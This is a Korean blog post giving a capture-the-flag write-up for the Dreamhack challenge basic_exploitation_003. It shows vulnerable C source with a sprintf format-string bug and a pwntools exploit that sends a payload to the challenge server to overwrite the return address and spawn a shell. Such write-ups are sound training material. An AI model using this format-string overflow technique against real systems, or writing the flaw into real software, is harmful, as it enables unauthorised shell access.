외로운 Nova의 작업실

dreamhack - basic_exploitation_003 본문

Computer App Penetesting/System Vulnerability

dreamhack - basic_exploitation_003

Nova_ 2023. 4. 28. 13:57

- source code

 

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(30);
}
void get_shell() {
    system("/bin/sh");
}
int main(int argc, char *argv[]) {
    char *heap_buf = (char *)malloc(0x80);
    char stack_buf[0x90] = {};
    initialize();
    read(0, heap_buf, 0x80);
    sprintf(stack_buf, heap_buf);
    printf("ECHO : %s\n", stack_buf);
    return 0;
}

sprintf(stack_buf, "%128d%1$", "\x12\x34\x56\x78")

 

- exploit code

 

from pwn import *

p = remote("23.81.42.210", 11786)

shell = 0x8048669

payload = b"%156c" + p32(shell)

p.send(payload)

p.recvline()
p.interactive()

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

dreamhack - basic_exploitation_002  (0) 2023.04.27
dreamhack - OOB write up  (0) 2023.04.25
dreamhack - fho write up  (0) 2023.04.24
dreamhack - hook write up  (0) 2023.04.22
dreamhack - oneshot write up  (0) 2023.04.21
Comments